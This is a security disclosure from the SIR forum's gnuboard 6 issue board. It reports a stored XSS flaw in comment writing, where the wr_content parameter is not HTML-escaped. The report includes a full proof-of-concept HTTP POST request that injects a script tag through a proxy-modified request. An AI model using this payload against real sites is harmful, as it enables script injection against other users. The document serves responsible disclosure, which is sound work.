Stored XSS vulnerability due to HTML Escape unprocessed when writing comments > 그누보드6 이슈

매뉴얼 FAQ
그누보드5
데모
자료실
  • 다운로드
  • 매뉴얼
  • Q&A
    • 창작마당
  • 팁자료실
  • 스킨
  • 빌더
  • 테마
  • 플러그인
  • 사용후기
    • 영카트5
    데모
    자료실
    창작마당
    정기결제
    데모
    자료실
    Q & A
    궁금한 게 있으신가요? 지금 질문해보세요!
    솔루션
    프로그래밍
    서버
    사이트운영
    컨텐츠몰
    나의 재능을 팔아보세요!
    부가서비스
    국내최저! 신용카드 결제수수료 2.85%
    제작의뢰
    커뮤니티
    커뮤니티
    소모임
    스터디
    AI 🌟
    강좌
    기타

    그누보드6 이슈

    좋은 댓글과 좋아요는 제작자에게 큰힘이 됩니다.

    Stored XSS vulnerability due to HTML Escape unprocessed when writing comments 정보

    Stored XSS vulnerability due to HTML Escape unprocessed when writing comments

    본문

    Hello.

    Currently, there is a writing vulnerability using the

    [Name of affected Product]

    gnuboard 6

    [Affected version]

    https://github.com/gnuboard/g6/commit/58c737a263ac0c523592fd87ff71b9e3c07d7cf5

    [Vulnerability Type]

    • Stored XSS

    [Root Cause]

    • While writing reply on a post, wr_content parameter is not sanitized html tags, so when posting reply with a HTML tag caused Stored XSS attack.

    [Attack Vectors]

    https://github.com/gnuboard/g6/assets/25397908/1165cc3e-b16a-402f-8438-731aa686d187

    As shown above, it is normally prohibited to enter HTML tags within a web browser, but if you manipulate HTTP requests using proxy tools such as Burp Suite or send web requests directly to the requests library to create comments, the HTML tags are reflected as they are.

    This enables Stored XSS attacks by injecting the tag <script>.

    The bottom is a PoC Web request.

    POST /board/write_comment_update/free HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 120
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/board/free/9
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ck_visit_ip=127.0.0.1; session=eyJpc19tb2JpbGUiOiBmYWxzZSwgInNzX3Rva2VuIjogImNhYjNmNTJlMWJiMGM4MTI5YjJkZWFhOThjNzU1NzNiIiwgInNzX3dyaXRlX3RpbWUiOiAiMjAyNC0wMS0xNyAxNzoyOToxMyIsICJzc19tYl9pZCI6ICJhZG1pbiIsICJzc19tYl9rZXkiOiAiYjQ1NDlkNDUyY2I5OGE4ZTQ0NjgxMjRlMDljN2U2ZDIifQ==.Zahxzw.f63f-VyyFl0nkkcr7ZReYkGnMm4
Connection: close

w=c&bo_table=free&wr_id=9&comment_id=&sca=&sfl=&stx=&spt=&page=&token=cab3f52e1bb0c8129b2deaa98c75573b&wr_content=<script>alert(1)</script>
    추천
    0

    댓글 1개

    90레벨 이상 댓글을 남길 수 있습니다.

    전체 173
    그누보드6 이슈 내용 검색

    회원로그인

    (주)에스아이알소프트 / 대표:홍석명 / (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1402호 / E-Mail: admin@sir.kr
    사업자등록번호: 217-81-36347 / 통신판매업신고번호:2014-서울강남-02098호 / 개인정보보호책임자:김민섭(minsup@sir.kr)
    © SIRSOFT